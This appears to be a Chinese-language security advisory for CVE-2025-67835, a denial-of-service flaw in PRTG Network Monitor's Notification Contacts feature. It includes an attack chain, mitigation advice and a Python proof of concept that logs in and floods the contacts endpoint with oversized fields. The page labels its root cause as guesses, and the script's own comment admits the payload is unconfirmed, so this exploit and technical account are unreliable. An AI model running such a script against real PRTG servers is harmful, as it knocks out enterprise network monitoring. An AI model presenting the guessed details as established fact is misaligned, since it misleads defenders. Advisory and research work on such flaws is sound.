CVE-2025-67835: Paessler PRTG Network Monitor Notification Contacts拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-67835

漏洞类型

拒绝服务(DoS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Paessler PRTG Network Monitor

漏洞概述

CVE-2025-67835是Paessler PRTG Network Monitor中的一个中等严重性拒绝服务漏洞。该漏洞存在于Notification Contacts（通知联系人）功能中，允许经过身份验证的低权限攻击者通过发送特制请求来触发服务中断。与传统的需要管理员权限的拒绝服务攻击不同，此漏洞使得任何具有基本账户访问权限的用户都能对系统可用性造成严重影响。由于PRTG Network Monitor通常作为企业关键网络监控基础设施运行，任何服务中断都可能导致监控盲区，影响企业对网络设备和服务的实时监控能力。该漏洞的CVSS评分为6.5，属于中等严重级别，主要影响系统的可用性。

技术细节

该拒绝服务漏洞存在于PRTG Network Monitor的Notification Contacts功能模块中。攻击者利用该功能时，通过构造特定的输入参数或请求序列，使得服务器端处理流程出现异常。漏洞的根本原因可能包括：1) 输入验证不充分导致内存资源耗尽；2) 异常处理逻辑缺陷导致服务进程崩溃；3) 资源竞争条件引发死锁或超时。由于该功能在处理用户提交的数据时未进行适当的边界检查和资源限制，恶意构造的请求会消耗大量服务器资源（如CPU、内存或数据库连接），最终导致监控服务无法响应正常请求。攻击者仅需拥有普通用户账户即可实施攻击，无需管理员权限，大大降低了攻击门槛。

攻击链分析

STEP 1

1.侦察阶段

攻击者识别目标PRTG Network Monitor版本，确认版本低于25.4.114

STEP 2

2.初始访问

攻击者获取PRTG系统的有效用户凭据（低权限账户即可）

STEP 3

3.漏洞利用

通过Notification Contacts功能发送特制请求，构造超长参数或异常数据触发资源耗尽

STEP 4

4.拒绝服务

服务器处理恶意请求时消耗大量资源，导致服务进程崩溃或响应中断

STEP 5

5.影响确认

PRTG监控服务不可用，企业网络监控能力丧失，可能导致其他安全事件无法及时发现

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67835 PoC - PRTG Notification Contacts DoS # Target: Paessler PRTG Network Monitor < 25.4.114 # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import requests import argparse from urllib.parse import urljoin def exploit_prtg_dos(target_url, username, password): """ Exploit for CVE-2025-67835: PRTG Notification Contacts DoS This script demonstrates how an authenticated low-privilege user can trigger a denial of service condition through the Notification Contacts functionality. Args: target_url: Base URL of PRTG server (e.g., https://prtg.example.com) username: Valid PRTG username password: User password """ session = requests.Session() # Step 1: Login to PRTG login_url = urljoin(target_url, '/public/login.htm') login_data = { 'username': username, 'password': password } print(f'[*] Attempting login to {login_url}') response = session.post(login_url, data=login_data) if response.status_code != 200: print('[-] Login failed') return False print('[+] Login successful') # Step 2: Create malicious notification contact # The specific payload depends on the exact vulnerability details notification_url = urljoin(target_url, '/api/notificationcontacts.htm') # Malicious payload that triggers DoS malicious_payload = { 'name': 'DoS Test Contact' * 100, # Excessive input 'email': '[email protected]' + 'x' * 10000, # Buffer overflow attempt 'method': 'email', 'action': 'add' } print(f'[*] Sending malicious notification contact request...') try: response = session.post(notification_url, data=malicious_payload) if response.status_code == 500 or response.status_code == 503: print('[+] DoS condition triggered - server error response') return True else: print(f'[*] Response status: {response.status_code}') return False except requests.exceptions.RequestException as e: print(f'[+] DoS triggered - connection failed: {e}') return True if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-67835 PoC') parser.add_argument('-t', '--target', required=True, help='PRTG target URL') parser.add_argument('-u', '--username', required=True, help='Username') parser.add_argument('-p', '--password', required=True, help='Password') args = parser.parse_args() exploit_prtg_dos(args.target, args.username, args.password)

影响范围

PRTG Network Monitor < 25.4.114

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制对PRTG管理界面的访问，仅允许受信任的管理员IP访问；2) 监控用户对Notification Contacts功能的使用情况，设置异常行为告警；3) 定期备份PRTG配置以便快速恢复；4) 考虑在网络层部署WAF/IPS设备对异常请求进行过滤；5) 最小化普通用户的权限，避免低权限用户访问敏感配置功能。